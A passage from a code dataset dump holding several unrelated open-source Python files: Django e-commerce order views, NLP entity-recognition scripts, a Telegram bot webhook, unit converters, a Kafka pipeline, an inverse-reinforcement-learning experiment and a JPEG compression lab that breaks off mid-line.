self.rowsToRanks[r]","repo_name":"maitnngo2002/AI-Chess-Engine","sub_path":"Chess/ChessEngine.py","file_name":"ChessEngine.py","file_ext":"py","file_size_in_byte":24433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32543991572","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.template.backends import django\nimport django.core.mail\n\nfrom .form import OrderForm\nfrom busket.models import busketItems\nfrom .models import Order, Payment, orderPoduct\nfrom store.models import product\nimport datetime\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\n\n\n\n\ndef place_order(request,total=0,quantity=0):\n # Gtotal = 0\n # tax = 0\n current_user = request.user\n cart_items = busketItems.objects.filter(user=current_user)\n cart_count =cart_items.count()\n if 
cart_count <= 0:\n return redirect('store')\n if request.method == 'POST':\n form = OrderForm(request.POST)\n\n for cart_item in cart_items:\n quantity += cart_item.quantity\n total += cart_item.product_busket_item.product_price * cart_item.quantity\n tax = (0.02 * total)\n Gtotal = total + tax\n print(form.errors)\n if form.is_valid():\n print(form.errors)\n data = Order()\n data.first_name = form.cleaned_data['first_name']\n data.last_name = form.cleaned_data['last_name']\n data.phone = form.cleaned_data['phone']\n data.email = form.cleaned_data['email']\n data.address_line_1 = form.cleaned_data['address_line_1']\n data.address_line_2 = form.cleaned_data['address_line_2']\n data.country = form.cleaned_data['country']\n data.state = form.cleaned_data['state']\n data.city = form.cleaned_data['city']\n data.order_note = form.cleaned_data['order_note']\n data.user = current_user\n data.total = Gtotal\n data.tax = tax\n data.ip = request.META.get('REMOTE_ADDR')\n data.save()\n yr = int(datetime.date.today().strftime('%Y'))\n dt = int(datetime.date.today().strftime('%d'))\n mt = int(datetime.date.today().strftime('%m'))\n d = datetime.date(yr,mt,dt)\n current_date = d.strftime('%Y%d%m')\n order_number = current_date+str(data.id)\n data.order_number = order_number\n data.save()\n order = Order.objects.get(user=current_user,is_ordered=False,order_number=order_number)\n context ={\n 'order':order,\n 'cart_items':cart_items,\n 'total':total,\n 'tax':tax,\n 'Gtotal':Gtotal\n\n }\n return render(request,'orders/payments.html',context)\n else:\n print('not vaild')\n print(form.errors)\n return redirect('checkout')\ndef payments(request):\n current_user = request.user\n body = json.loads(request.body)\n print(body)\n order = Order.objects.get(user= current_user,is_ordered=False, order_number=body['orderID'])\n payment = Payment(\n user = current_user,\n payment_id = body['transID'],\n payment_method = body['payment_method'],\n status = body['status'],\n amount_paid= order.total,\n\n )\n payment.save()\n order.payment = payment\n order.is_ordered = True\n order.save()\n cart_items = busketItems.objects.filter(user=current_user)\n for item in cart_items:\n #fill order product model\n orderPoductt = orderPoduct()\n orderPoductt.order_id = order.id\n orderPoductt.payment = payment\n orderPoductt.user_id = current_user.id\n orderPoductt.product_id = item.product_busket_item_id\n orderPoductt.quantity = item.quantity\n orderPoductt.product_price = item.product_busket_item.product_price\n orderPoductt.ordered = True\n orderPoductt.save()\n # bring variations because it is many to many\n cart_item = busketItems.objects.get(id=item.id)\n product_variation= cart_item.variations.all()\n orderPoducttt = orderPoduct.objects.get(id=orderPoductt.id)\n orderPoducttt.variations.set(product_variation)\n orderPoducttt.save()\n # Reduce the quantity\n productt = product.objects.get(id=item.product_busket_item_id)\n productt.product_stock -= item.quantity\n productt.save()\n #clear cart\n busketItems.objects.filter(user=current_user).delete()\n #send mail to customer\n mail_subject = 'Congratulation your order has set successfully'\n mail_body = render_to_string('orders/orderset.html', {\n 'user': current_user,\n 'order_number': order ,\n\n })\n to_email = current_user.email\n send_mail = django.core.mail.EmailMessage(mail_subject, mail_body, to=[to_email])\n send_mail.send()\n # send data to invoice\n data ={\n 'order_number':order.order_number,\n 'transID': payment.payment_id,\n }\n return JsonResponse(data)\ndef 
order_complete(request):\n order_number = request.GET.get('order_number')\n payment_id = request.GET.get('payment_id')\n try:\n order = Order.objects.get(order_number=order_number, is_ordered=True)\n order_Poduct = orderPoduct.objects.filter(order_id=order.id)\n payment = Payment.objects.get(payment_id=payment_id)\n Sub_Total = 0\n for i in order_Poduct:\n Sub_Total += i.product_price * i.quantity\n\n context={\n 'order':order,\n 'order_Poduct':order_Poduct,\n 'order_number':order_number,\n 'payment_id':payment,\n 'Sub_Total':Sub_Total\n }\n return render(request, 'orders/order_complete.html', context)\n except(Order.DoesNotExist,Payment.DoesNotExist):\n return redirect('home')\n\n\n\n\n\n\n\n\n","repo_name":"mohamed-mashaly1403/greatCart-django-python","sub_path":"Cart/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23084832631","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\n\n\nif __name__ == \"__main__\":\n word = input(\"Введите слово: \")\n s = int(input(\"Введите № буквы, которую желаете переставить: \"))\n k = int(input(\"Введите № буквы, на место которой нужно поставить букву: \"))\n\n if s >= k:\n print(\"Недопустимое значение\", file=sys.stderr)\n exit(1)\n\n s -= 1\n k -= 1\n\n print(word[:s] + word[s + 1:k + 1] + word[s] + word[k + 1:])","repo_name":"DFooRS/6laba","sub_path":"individual3.py","file_name":"individual3.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73612320362","text":"n, m = map(int, input().split())\n\n\ndef next_position():\n while True:\n middle = m // 2 + (m % 2)\n count = m\n left, right = middle, middle\n if m % 2 == 1:\n left_diff, right_diff = -1, 1\n else:\n left_diff, right_diff = 1, -1\n yield middle\n while count > 1:\n left += left_diff\n yield left\n count -= 1\n if count == 1:\n break\n right += right_diff\n yield right\n count -= 1\n\n\npos = next_position()\n\nfor _ in range(n):\n print(next(pos))\n","repo_name":"kirilllapushinskiy/code","sub_path":"tinkoff-golang-for-all/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24536057947","text":"###### Named Entity Recognition with nltk ##############################\r\nimport nltk\r\nfrom nltk.tokenize import word_tokenize, sent_tokenize\r\n\r\n\r\nnltk.download('averaged_perceptron_tagger')\r\nnltk.download('maxent_ne_chunker')\r\nnltk.download('words')\r\n\r\n\r\narticle = open(r'C:\\Users\\sg_cl\\Desktop\\Pythonproject\\Final exam\\ML\\scene_one.txt')\r\n#open(r'C:\\Users\\sg_cl\\Desktop\\Pythonproject\\Final exam\\ML\\article.txt', encoding=\"utf8\")\r\narticle = article.read().replace(\"\\n\",\" \")\r\n#print(article)\r\n\r\nsentence = nltk.sent_tokenize(article)\r\n# Tokenize each sentence into words: token_sentences\r\ntoken = [nltk.word_tokenize(f) for f in sentence]\r\n#print(token)\r\n\r\n# Tag each tokenized sentence into parts of speech: pos_sentences\r\npos_tag = [nltk.pos_tag(t) for t in token]\r\n\r\n# Create the named entity chunks: chunked_sentences\r\nchunked_sentences = nltk.ne_chunk_sents(pos_tag, binary = True)\r\n#print(list(chunked_sentences))\r\n\r\n# Test for stems of the tree with 'NE' tags\r\nfor sent in chunked_sentences:\r\n for chunk in sent:\r\n if hasattr(chunk, \"label\") 
and chunk.label() == \"NE\":\r\n print(chunk)\r\n \r\n\r\n############# Charting practice #################################################\r\n\r\nimport collections\r\n\r\n# Create the defaultdict: ner_categories\r\nner_categories = collections.defaultdict(int)\r\n\r\n#fill up the dictionary with values\r\nfor sent in chunked_sentences:\r\n for chunk in sent:\r\n if hasattr(chunk, 'label'):\r\n ner_categories[chunk.label()] += 1\r\n#print(ner_categories)\r\n\r\n#Create a list called labels from the keys of dictionary(ner_categories)\r\nlabels = list(ner_categories.keys())\r\n#print(labels)\r\n\r\n#Create list of values\r\nvalues = [ner_categories.get(v) for v in labels]\r\n\r\n########## spacy ##################################################################\r\n\r\nimport spacy\r\n\r\n#instantiate english model\r\nnlp = spacy.load(\"en_core_web_sm\")\r\n\r\n#create the doc\r\ndoc = nlp(article)\r\n\r\n#print all of the found entities and their labels\r\nfor x in doc.ents:\r\n print(x.label_,x.text)\r\n \r\n############ Polyglot ##############################################################\r\nfrom polyglot.text import Text\r\n\r\n# Spanish test sentence, kept in Spanish on purpose: polyglot is used here for multilingual NER\r\ntest = 'telediario dijeron que tendríamos un nuevo día feriado nacional.'\r\n\r\nptext = Text(test)\r\n\r\n# Print each of the entities found\r\nfor ent in ptext.entities:\r\n print(ent)\r\n \r\n# Print the type of ent\r\nprint(type(ent))\r\n\r\n\r\n\r\n","repo_name":"srig619iitS/NLP","sub_path":"NLP_NER.py","file_name":"NLP_NER.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29585500076","text":"import json\nimport logging\nfrom typing import Optional\n\nfrom telebot import TeleBot\nfrom telebot.types import Update\n\nfrom django.http import HttpResponse\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\n\n__all__ = [\"WebHookView\"]\n\nfrom apps.common.utils import get_object_or_none\nfrom apps.users.models import Event, User\n\nlogger = logging.getLogger(\"telegram.bot\")\n\n\nclass WebHookView(View):\n BOT: TeleBot = None\n\n @method_decorator(csrf_exempt)\n def dispatch(self, *args, **kwargs):\n return super(WebHookView, self).dispatch(*args, **kwargs)\n\n @property\n def bot(self) -> TeleBot:\n if not WebHookView.BOT:\n from apps.bot.bot import bot\n from apps.bot.handlers import common # noqa\n from apps.bot.handlers import find_trip # noqa\n from apps.bot.handlers import new_trip # noqa\n from apps.bot.handlers import trips_list # noqa\n\n WebHookView.BOT = bot\n\n return WebHookView.BOT\n\n def post(self, request) -> HttpResponse:\n body = request.body.decode(\"utf-8\")\n\n try:\n data = json.loads(body)\n\n if \"callback_query\" in data:\n text = data[\"callback_query\"][\"data\"]\n\n button_text = None\n for buttons in data[\"callback_query\"][\"message\"][\"reply_markup\"][\"inline_keyboard\"]:\n for button in buttons:\n if text == button[\"callback_data\"]:\n button_text = f\"Button '{button['text']}'\"\n break\n if button_text:\n break\n if button_text:\n text = button_text\n\n else:\n try:\n if \"photo\" in data[\"message\"]:\n text = data[\"message\"].get(\"text\", \"<PHOTO>\")\n elif \"document\" in data[\"message\"]:\n text = data[\"message\"].get(\"text\", \"<DOCUMENT>\")\n else:\n text = data[\"message\"].get(\"text\", \"<NO TEXT>\")\n except Exception as e:\n logger.exception(\"Error occurred\")\n text = \"\"\n\n if 
\"callback_query\" in data:\n data = data[\"callback_query\"]\n\n telegram_user_id = data[\"message\"][\"chat\"][\"id\"]\n user: Optional[User] = get_object_or_none(User, telegram_user_id=telegram_user_id)\n if user:\n Event.objects.create(user=user, text=text, message_id=data[\"message\"][\"message_id\"])\n else:\n logger.warning(f\"telegram_user_id={telegram_user_id} was not found\")\n except Exception as e:\n logger.exception(f\"Error occurred: >>>{body}<<<\")\n\n try:\n update = Update.de_json(body)\n self.bot.process_new_updates([update])\n except Exception as e:\n logger.exception(\"Error occurred at parse TG request\")\n return HttpResponse(\"\", status=500)\n\n return HttpResponse(\"OK\")\n","repo_name":"DrMartiner/telegram_travel_bot","sub_path":"apps/bot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"46062583813","text":"# The poscUnits22.xml file is missing a few units which would be quite useful\n# This allows you to add additional units to the list.\nfrom __future__ import print_function, annotations\n\nimport decimal\n\nfrom . import convert\n\n\ndef register_pre(units):\n pass\n\n\ndef register_post(units):\n exponents = {\n 1024: (\n (0, '', ''),\n (1, 'ki', 'kibi'),\n (2, 'Mi', 'mebi'),\n (3, 'Gi', 'gibi'),\n (4, 'Ti', 'tebi'),\n (5, 'Pi', 'pebi'),\n ),\n 1000: (\n (0, '', ''),\n (1, 'k', 'kilo'),\n (2, 'M', 'mega'),\n (3, 'G', 'giga'),\n (4, 'T', 'tera'),\n (5, 'P', 'peta'),\n ),\n }\n\n for base, exponents in exponents.items():\n for exponent, prefix, full_prefix in exponents:\n multiplier = base**exponent\n\n params = dict(\n units=units,\n quantity_types=['digital storage'],\n )\n\n id_ = f'{prefix}bit'\n name = f'{full_prefix}bit'\n convert.Unit(\n base_unit='bit' if exponent else None,\n id=id_,\n name=name,\n annotations=[f'{prefix.lower()}b', f'{prefix}b', id_, name],\n conversion_params=('0', str(multiplier), '8', '0'),\n **params,\n ).register(units)\n\n id_ = f'{prefix}byte'\n name = f'{full_prefix}byte'\n convert.Unit(\n id=id_,\n name=name,\n base_unit='byte' if exponent else None,\n annotations=[f'{prefix.lower()}B', f'{prefix}B', id_, name],\n conversion_params=('0', str(multiplier), '1', '0'),\n **params,\n ).register(units)\n\n liter = units.get('L')\n liter.copy(\n units=units,\n id='teaspoon',\n name='teaspoon',\n annotations=['t', 'tsp'],\n conversion_params=('0', '0.000005', '1', '0'),\n fractional=True,\n ).register(units)\n liter.copy(\n units=units,\n id='tablespoon',\n name='tablespoon',\n annotations=['tbl', 'tbs', 'tbsp'],\n conversion_params=('0', '0.000015', '1', '0'),\n fractional=True,\n ).register(units)\n liter.copy(\n units=units,\n id='cup',\n name='cup',\n annotations=['cup'],\n conversion_params=('0', '0.000240', '1', '0'),\n fractional=True,\n ).register(units)\n\n units.get('in').fractional = True\n foot = units.get('ft')\n foot.split = 'in'\n foot.fractional = True\n\n prefixes = {\n ('milli', 'm'): decimal.Decimal('1e-3'),\n ('nano', 'n'): decimal.Decimal('1e-9'),\n }\n farad = units.get('farad')\n for prefixes, multiplier in prefixes.items():\n id_ = prefixes[1] + farad.id\n name = prefixes[0] + farad.name\n\n farad.copy(\n units=units,\n id=id_,\n name=name,\n annotations=[f'{prefix}f' for prefix in prefixes] + [id_, name],\n conversion_params=tuple(map(str, (0, multiplier, 1, 0))),\n ).register(units)\n\n hz = units.get('Hz')\n hz.conversion_params = 
tuple(units.get('cycles/second').conversion_params)\n hz.base_unit = 'radians/second'\n hz.register(units)\n","repo_name":"wolph/alfred-converter","sub_path":"converter/extra_units.py","file_name":"extra_units.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"19"} +{"seq_id":"12404391901","text":"'''\nCreated on 06-Apr-2020\n\n@author: srinivasan\n'''\nimport logging\nfrom scrapy.utils.serialize import ScrapyJSONEncoder\n\nlogger = logging.getLogger(__name__)\n\n\nclass KafkaPipeline:\n \n stats_name = 'KafkaPipeline'\n \n def __init__(self, settings, stats):\n from pykafka.client import KafkaClient\n self.stats = stats\n self.settings = settings\n self.encoder = ScrapyJSONEncoder()\n self.client = KafkaClient(hosts=settings.get('KAFKA_BOOTSTRAP_SERVERS'))\n self.producer = self.client.topics[bytes(settings.get('KAFKA_TOPIC_NAME'), 'ascii')]\\\n .get_sync_producer(min_queued_messages=1)\n \n @classmethod\n def from_crawler(cls, crawler):\n return cls(crawler.settings, crawler.stats)\n \n def process_item(self, item, spider):\n itemval = item if isinstance(item, dict) else dict(item)\n itemval['spider'] = spider.name\n self.producer.produce(bytes(self.encoder.encode(itemval),\n 'ascii'))\n self.stats.inc_value('{}/produce'.format(self.stats_name), spider=spider)\n logger.info(\"Item sent to Kafka\")\n return itemval\n \n def close_spider(self, spider):\n if self.producer:\n self.producer.stop()\n","repo_name":"gyan42/spark-streaming-playground","sub_path":"src/ssp/news_scrape/news_scrape/pipelines/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"17459542286","text":"import datetime\nimport os\nimport shutil\nimport sys\n\nclass WorkingDirectory(object):\n \"\"\"\n Change to a working directory and ensure that the old working directory is restored afterwards.\n \"\"\"\n def __init__(self, directory):\n self.directory = directory\n self.old_dir = os.getcwd()\n os.chdir(directory)\n def __enter__(self):\n return None\n def __exit__(self, type_, value_, traceback_):\n if type_:\n print(\"Error during processing in '%s'\" % self.directory, file=sys.stderr)\n os.chdir(self.old_dir)\n # return False to re-raise an occured exception\n return False\n\ndef get_timestamp_string(timestamp=None, file_name_compatible=False):\n \"\"\"\n Get a timestamp string for the given timestamp. When timestamp is None use the current time.\n \"\"\"\n if timestamp is None:\n timestamp = datetime.datetime.now()\n if file_name_compatible:\n return timestamp.strftime(\"%Y-%m-%d__%H_%M_%S\")\n else:\n return timestamp.strftime(\"%Y-%m-%d, %H:%M:%S\")\n\ndef convert_timestamp_string_to_timestamp(timestamp_string, file_name_compatible=False):\n \"\"\"\n The inverse operation for get_timestamp_string.\n \"\"\"\n if file_name_compatible:\n return datetime.datetime.strptime(timestamp_string, \"%Y-%m-%d__%H_%M_%S\")\n else:\n return datetime.datetime.strptime(timestamp_string, \"%Y-%m-%d, %H:%M:%S\")\n\ndef make_timestamped_backup_file(file_name, postfix=\"\", keep_old=True, bak_extension=\"\"):\n \"\"\"\n Create a backup file. 
Derive its backup file name from its last modification timestamp.\n \"\"\"\n if os.path.exists(file_name):\n file_timestamp = datetime.datetime.fromtimestamp(os.stat(file_name).st_mtime)\n TIME_STAMP_FORMAT = \"%Y-%m-%d_%H_%M_%S\"\n timestamp_string = file_timestamp.strftime(TIME_STAMP_FORMAT)\n file_base_name, file_ext = os.path.splitext(file_name)\n new_file_name = \"%s__%s%s%s%s\" % (file_base_name, timestamp_string, postfix, file_ext, bak_extension)\n if not os.path.exists(new_file_name):\n if keep_old:\n shutil.copy2(file_name, new_file_name)\n else:\n os.rename(file_name, new_file_name)\n else:\n from .Logging import Log\n Log().warning(\"'%s' does already exist\" % new_file_name)\n return new_file_name\n\ndef indent_text(text, indent=2):\n \"\"\"\n Indent the given text by indent spaces.\n \"\"\"\n prefix = \" \"*indent\n result = \"\"\n for line in text.split(\"\\n\"):\n result += \"%s%s\\n\" % (prefix, line)\n return result\n\ndef plural_s(decider):\n \"\"\"\n Return a plural 's' when the length of decider is != 1.\n \"\"\"\n if type(decider) == int:\n length = decider\n else:\n length = len(decider)\n if length == 1:\n return \"\"\n else:\n return \"s\"\n","repo_name":"novaspring/libmscboostpython","sub_path":"src/MscBoost/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25454668740","text":"import numpy as np\nimport numpy.random as random\nimport torch\nimport os\n\nfrom objectworld import ObjectWorld\nfrom binaryworld import BinaryWorld\nfrom sem import SEM\nfrom mcem import MCEM\nfrom mdp import MDP\nfrom drawing import Drawing\ntorch.manual_seed(0)\n\nmiirl_type = 'SEM' # either 'SEM' or 'MCEM', where 'SEM' : SEM-MIIRL and 'MCEM' : MCEM-MIIRL \ngame_type = 'ow' # either 'ow' or 'bw', where 'ow' : M-ObjectWorld and 'bw' : M-BinaryWorld\ncheckpoint_dir = './checkpoints'\nsample_length = 8 # the length of each demonstration sample\nalpha = 1 # concentration parameter\nsample_size = 16 # the number of demonstrations for each reward/intention\nrewards_types = ['A','B'] # intention/reward types which are in total six, ['A','B','C','D','E','F']\nmirl_maxiter = 200 # maximum number of iterations\n\nexp_n = 1\nseed = 1\n\n\ncheckpoint = {\n\n 'seed': [],\n 'game_type': [],\n 'miirl_type': [],\n 'game': [],\n 'model': [],\n 'rewards': [],\n 'rewards_types': [],\n 'rewardssquence' : [],\n 'linmodel_solutions': [],\n 'all_example_samples': [],\n 'n_samples' : [],\n 'mirl_solutions' : [],\n 'EVDs' : [],\n }\n\n\ncheckpoint_name = str(exp_n)+miirl_type+game_type\ncheckpoint_path = os.path.join(checkpoint_dir,checkpoint_name+'.pt')\nimage_path = os.path.join(checkpoint_dir,checkpoint_name+'.png')\n\nif game_type == 'ow':\n game = ObjectWorld(seed=seed)\nelif game_type == 'bw':\n game = BinaryWorld(seed=seed)\n\nmodel = MDP(game)\ncheckpoint['seed'] = seed\ncheckpoint['game_type'] = game_type\ncheckpoint['miirl_type'] = miirl_type\ncheckpoint['game'] = game\ncheckpoint['model'] = model\n\nprint('Saving game and model to {}'.format(checkpoint_path))\ntorch.save(checkpoint, checkpoint_path)\nprint('Done.')\n\nrewards = []\nlinmodel_solutions = []\nall_example_samples = []\nn_samples = []\n\nfor r in range(len(rewards_types)):\n reward = game.gamereward(rewards_types[r])\n linmodel_solution = model.linearmdpsolve(reward)\n n_sample = sample_size\n example_samples = model.sampleexamples(linmodel_solution, training_samples = n_sample, 
training_sample_length=sample_length)\n for i in range(len(example_samples)):\n all_example_samples.append(example_samples[i])\n rewards.append(reward)\n linmodel_solutions.append(linmodel_solution)\n n_samples.append(n_sample)\n\nif miirl_type == 'SEM':\n\n Mirl = SEM(\n game, rewards, model, linmodel_solutions, \n all_example_samples, n_samples, 1, alpha\n )\nelif miirl_type == 'MCEM':\n\n Mirl = MCEM(\n game, rewards, model, linmodel_solutions,\n all_example_samples, n_samples, 1, alpha\n )\n\nprint('solving for sample_size '+str(sample_size)+':')\nprint('solving for reward types '+str(rewards_types)+':')\nprint('MIRL training:')\n\nmirl_solutions, EVDs, rewardssquence = Mirl.momaxentrun(maxIter = mirl_maxiter)\n\nprint('MIRL training is finished')\nprint('Generating the picture ...')\nDrawing(game, rewards, rewardssquence, model, linmodel_solutions,all_example_samples, mirl_solutions,image_path)\n\ncheckpoint['rewards'] = rewards\ncheckpoint['rewards_types'] = rewards_types\ncheckpoint['rewardssquence'] = rewardssquence\ncheckpoint['linmodel_solutions'] = linmodel_solutions\ncheckpoint['all_example_samples'] = all_example_samples\ncheckpoint['n_samples'] = n_samples\ncheckpoint['mirl_solutions'] = mirl_solutions\ncheckpoint['EVDs'] = EVDs\nprint('Saving mirl solutions to {} ...'.format(checkpoint_path))\ntorch.save(checkpoint, checkpoint_path)\nprint('Done.')\n\n \n\n\n\n","repo_name":"tue-mps/damiirl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"6110442958","text":"#!/usr/bin/env python3\nimport zlib\nimport numpy\nimport lab4_utils as l4utils\nimport cv2 as cv\n\n# 0. Image data\ncolors_in_batch = 128\nbatches = 7\nimg_width = batches * colors_in_batch\nimg_height = 512\nimg_px_size = img_width * img_height\nr_versor = numpy.array([1, 0, 0], dtype=numpy.uint8)\ng_versor = numpy.array([0, 1, 0], dtype=numpy.uint8)\nb_versor = numpy.array([0, 0, 1], dtype=numpy.uint8)\nstep_size = 256 // colors_in_batch\ncurrent_color = numpy.array([0, 0, 0], dtype=numpy.uint8)\nimage = numpy.empty(shape=(img_height, img_width, 3), dtype=numpy.uint8)\nfor batch_idx in range(batches):\n current_op = None\n if batch_idx == 0:\n current_op = b_versor\n elif batch_idx == 1:\n current_op = g_versor\n elif batch_idx == 2:\n current_op = -b_versor\n elif batch_idx == 3:\n current_op = r_versor\n elif batch_idx == 4:\n current_op = -g_versor\n elif batch_idx == 5:\n current_op = b_versor\n elif batch_idx == 6:\n current_op = g_versor\n for step_idx in range(colors_in_batch):\n if step_idx == 0:\n current_color += (step_size - 1) * current_op\n else:\n current_color += step_size * current_op\n image[:, batch_idx * colors_in_batch + step_idx, :] = current_color\n\n# image: image, shape(height, width, 3), type(uint8)\nimg_bgr = cv.cvtColor(image, cv.COLOR_RGB2BGR)\n\nlabel_before_compress = 'Before compression'\ncv.namedWindow(label_before_compress, cv.WINDOW_NORMAL)\ncv.imshow(label_before_compress, img_bgr)\n# cv.waitKey(0)\n# cv.destroyAllWindows()\n\n# 1. Convert RGB to YCbCr\nimg_yCrCb = cv.cvtColor(img_bgr, cv.COLOR_BGR2YCrCb)\nimg_y = img_yCrCb[:, :, 0]\nimg_Cr = img_yCrCb[:, :, 1]\nimg_Cb = img_yCrCb[:, :, 2]\n\n\n# 2. 
Downsampling on Cb Cr\ndef downsample(img_1ch, ratio):\n return img_1ch[::ratio, ::ratio].copy()\n\n\ndu_sample_ratio = 4\nimg_Cr_downsample = downsample(img_Cr, du_sample_ratio)\nimg_Cb_downsample = downsample(img_Cb, du_sample_ratio)\n\n\n# 3. Produce 8x8 blocks\ndef extract_blocks_8(img_1ch):\n n_y_step = img_1ch.shape[0] // 8\n n_x_step = img_1ch.shape[1] // 8\n blocks = numpy.empty(shape=(n_y_step * n_x_step, 8, 8), dtype=numpy.uint8)\n block_idx = 0\n for y in range(n_y_step):\n for x in range(n_x_step):\n blocks[block_idx, :, :] = img_1ch[y * 8:(y + 1) * 8, x * 8:(x + 1) * 8]\n block_idx += 1\n return blocks\n\n\nimg_y_8blocks = extract_blocks_8(img_y)\nimg_Cr_ds_8blocks = extract_blocks_8(img_Cr_downsample)\nimg_Cb_ds_8blocks = extract_blocks_8(img_Cb_downsample)\n\n\n# 4. Calculate DCT on each block\ndef dct_on_each_block(img_1ch_8b):\n result = numpy.empty(shape=img_1ch_8b.shape, dtype=numpy.float64)\n for i in range(img_1ch_8b.shape[0]):\n result[i, :, :] = l4utils.dct2(img_1ch_8b[i, :, :])\n return result\n\n\nimg_y_8b_dct = dct_on_each_block(img_y_8blocks)\nimg_Cr_ds_8b_dct = dct_on_each_block(img_Cr_ds_8blocks)\nimg_Cb_ds_8b_dct = dct_on_each_block(img_Cb_ds_8blocks)\n\n\n# 5. Divide each block by quantisation matrix\n# 6. Round each block to integers\ndef div_each_block_by_qmat(img_1ch_8b_dct, q_type, qf):\n result = numpy.empty(shape=img_1ch_8b_dct.shape, dtype=numpy.int16)\n for i in range(img_1ch_8b_dct.shape[0]):\n if q_type == 'qy':\n res = img_1ch_8b_dct[i, :, :] / l4utils.QY(qf)\n else:\n res = img_1ch_8b_dct[i, :, :] / l4utils.QC(qf)\n result[i, :, :] = numpy.around(res)\n return result\n\n\nquality_factor = 95\nimg_y_8b_dct_qr = div_each_block_by_qmat(img_y_8b_dct, 'qy', quality_factor)\nimg_Cr_ds_8b_dct_qr = div_each_block_by_qmat(img_Cr_ds_8b_dct, 'qc', quality_factor)\nimg_Cb_ds_8b_dct_qr = div_each_block_by_qmat(img_Cb_ds_8b_dct, 'qc', quality_factor)\n\n\n# 7. Zig Zag\ndef zigzag(img_1ch):\n result = [[] for _ in range(img_1ch.shape[0] + img_1ch.shape[1] - 1)]\n for y in range(img_1ch.shape[0]):\n for x in range(img_1ch.shape[1]):\n idx_sum = y + x\n if idx_sum % 2 == 0:\n result[idx_sum].insert(0, img_1ch[y, x])\n else:\n result[idx_sum].append(img_1ch[y, x])\n flattened_numpy_result = numpy.empty(shape=img_1ch.shape[0] * img_1ch.shape[1], dtype=numpy.uint8)\n\n next_idx = 0\n for sublist in result:\n for item in sublist:\n flattened_numpy_result[next_idx] = item\n next_idx += 1\n\n return flattened_numpy_result\n\n\nimg_y_zz = zigzag(img_y)\nimg_Cr_ds_zz = zigzag(img_Cr_downsample)\nimg_Cb_ds_zz = zigzag(img_Cb_downsample)\n\n# 8. Flatten, concatenate, compress and calculate the size -- how many bytes?\nimg_flat_concat = numpy.empty(shape=img_y_zz.shape[0] + img_Cr_ds_zz.shape[0] + img_Cb_ds_zz.shape[0],\n dtype=numpy.uint8)\nifc_lim_0 = 0\nifc_lim_1 = ifc_lim_0 + img_y_zz.size\nifc_lim_2 = ifc_lim_1 + img_Cr_ds_zz.size\nifc_lim_3 = ifc_lim_2 + img_Cb_ds_zz.size\nimg_flat_concat[ifc_lim_0:ifc_lim_1] = img_y_zz\nimg_flat_concat[ifc_lim_1:ifc_lim_2] = img_Cr_ds_zz\nimg_flat_concat[ifc_lim_2:ifc_lim_3] = img_Cb_ds_zz\n\ncmpsd_img_flat_concat = zlib.compress(img_flat_concat.tobytes(), level=9)\n# print('Approximated size of the compressed image: {0} B'.format(len(cmpsd_img_flat_concat)))\n\njpeg_img_data = img_y_8b_dct_qr.tobytes() + img_Cr_ds_8b_dct_qr.tobytes() + img_Cb_ds_8b_dct_qr.tobytes()\ncmpsd_jpeg_img_data = zlib.compress(jpeg_img_data, level=9)\nprint('Approximated size of the compressed jpeg image: {0} B'.format(len(cmpsd_jpeg_img_data)))\n\n\n# 7'. 
Undo Zig Zag\n# We can skip it in this exercise!\n\n# 6'. Nothing to do here ¯\\_(ツ)_/¯\n# For the next step, just reuse the rounded data obtained in step 6.\n\n# 5'. Reverse division by quantisation matrix -- multiply\ndef mult_each_block_by_qmat(img_1ch_8b_dct_qr, q_type, qf):\n result = numpy.empty(shape=img_1ch_8b_dct_qr.shape, dtype=numpy.int16)\n for i in range(img_1ch_8b_dct_qr.shape[0]):\n if q_type == 'qy':\n result[i, :, :] = img_1ch_8b_dct_qr[i, :, :] * l4utils.QY(qf)\n else:\n result[i, :, :] = img_1ch_8b_dct_qr[i, :, :] * l4utils.QC(qf)\n return result\n\n\nr_img_y_8b_dct_qr = mult_each_block_by_qmat(img_y_8b_dct_qr, 'qy', quality_factor)\nr_img_Cr_ds_8b_dct_qr = mult_each_block_by_qmat(img_Cr_ds_8b_dct_qr, 'qc', quality_factor)\nr_img_Cb_ds_8b_dct_qr = mult_each_block_by_qmat(img_Cb_ds_8b_dct_qr, 'qc', quality_factor)\n\n\n# 4'. Reverse DCT\ndef idct_on_each_block(img_1ch_8b_dct):\n result = numpy.empty(shape=img_1ch_8b_dct.shape, dtype=numpy.uint8)\n for i in range(img_1ch_8b_dct.shape[0]):\n res = l4utils.idct2(img_1ch_8b_dct[i, :, :])\n # clip to [0, 255] before the uint8 cast: the inverse DCT of quantised data can slightly over-/undershoot and would otherwise wrap around\n result[i, :, :] = numpy.clip(numpy.around(res), 0, 255)\n return result\n\n\nr_img_y_8b_dct = 